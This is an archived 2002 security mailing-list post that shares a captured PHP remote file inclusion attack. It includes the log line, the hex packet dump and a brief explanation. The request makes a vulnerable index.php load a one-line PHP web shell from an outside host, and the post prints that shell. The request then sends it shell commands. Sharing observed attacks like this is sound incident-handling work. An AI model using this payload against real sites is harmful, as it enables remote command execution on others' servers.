Good practicle php attack example

From: zeno (bugtraq@cgisecurity.net)
Date: 09/17/02


From: zeno <bugtraq@cgisecurity.net>
To: webppsec@securityfocus.com
Date: Tue, 17 Sep 2002 14:12:39 -0400 (EDT)

I figured a few people may find this interesting.

200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET /index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Q312461)"

contents of www.jtecx.hpg.com.br/jtec.txt

------------------- start snip

<?php
system($cmd);
?>

------------------- end snip

He is attempting to include code from site B into site A and have it execute the code locally.
You can see he is issuing it commands via a query "&cmd=uname%20-a;id".

Anyone else have any good examples of these types of attacks? Real life experiences, etc...

- zeno@cgisecurity.com

FULL PACKET DUMP BELOW

0x0000: 00 A0 24 91 0E C2 00 01 97 DB C8 00 08 00 45 00 ..$...........E.
0x0010: 02 36 C6 13 40 00 25 06 58 54 C8 98 50 16 C7 7D .6..@.%.XT..P..}
0x0020: 55 2E 08 57 00 50 BA AF F1 7E C9 CF A9 D0 50 18 U..W.P...~....P.
0x0030: E4 20 9A 2D 00 00 47 45 54 20 2F 69 6E 64 65 78 . .-..GET /index
0x0040: 2E 70 68 70 3F 66 69 6C 65 3D 68 74 74 70 3A 2F .php?file=http:/
0x0050: 2F 77 77 77 2E 6A 74 65 63 78 2E 68 70 67 2E 63 /www.jtecx.hpg.c
0x0060: 6F 6D 2E 62 72 2F 6A 74 65 63 2E 74 78 74 26 63 om.br/jtec.txt&c
0x0070: 6D 64 3D 75 6E 61 6D 65 20 2D 61 3B 69 64 20 64 md=uname -a;id d
0x0080: 20 48 54 54 50 2F 31 2E 30 0D 0A 41 63 63 65 70 HTTP/1.0..Accep
0x0090: 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69 6D t: image/gif, im
0x00A0: 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20 69 age/x-xbitmap, i
0x00B0: 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67 65 mage/jpeg, image
0x00C0: 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61 74 /pjpeg, applicat
0x00D0: 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65 6C ion/vnd.ms-excel
0x00E0: 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 76 6E , application/vn
0x00F0: 64 2E 6D 73 2D 70 6F 77 65 72 70 6F 69 6E 74 2C d.ms-powerpoint,
0x0100: 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D 73 77 application/msw
0x0110: 6F 72 64 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 ord, */*..Accept
0x0120: 2D 4C 61 6E 67 75 61 67 65 3A 20 70 74 20 2D 62 -Language: pt -b
0x0130: 72 0D 0A 41 63 63 65 70 74 2D 20 45 6E 63 6F 64 r..Accept- Encod
0x0140: 69 6E 67 3A 20 67 7A 69 70 20 2C 20 64 65 66 6C ing: gzip , defl
0x0150: 61 74 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A ate..User-Agent:
0x0160: 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F Mozilla/4.0 (co
0x0170: 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 mpatible; MSIE 6
0x0180: 2E 30 3B 20 57 69 6E 64 6F 77 73 20 39 38 3B 20 .0; Windows 98;
0x0190: 51 33 31 32 34 36 31 29 0D 0A 56 69 61 3A 20 31 Q312461)..Via: 1
0x01A0: 2E 31 20 66 77 2D 61 73 73 2E 70 72 75 64 65 2E .1 fw-ass.prude.
0x01B0: 6E 65 74 3A 38 30 38 30 20 28 53 71 75 69 64 2F net:8080 (Squid/
0x01C0: 32 2E 34 2E 53 54 41 42 4C 45 36 29 0D 0A 58 2D 2.4.STABLE6)..X-
0x01D0: 46 6F 72 77 61 72 64 65 64 2D 46 6F 72 3A 20 32 Forwarded-For: 2
0x01E0: 30 30 2E 31 35 32 2E 38 33 2E 31 39 39 0D 0A 48 00.152.83.199..H
0x01F0: 6F 73 74 3A 20 77 77 77 2E 63 67 69 73 65 63 75 ost: www.cgisecu
0x0200: 72 69 74 79 2E 63 6F 6D 0D 0A 43 61 63 68 65 2D rity.com..Cache-
0x0210: 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 67 65 Control: max-age
0x0220: 3D 33 30 30 30 30 30 30 0D 0A 43 6F 6E 6E 65 63 =3000000..Connec
0x0230: 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 tion: keep-alive
0x0240: 0D 0A 0D 0A ....

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com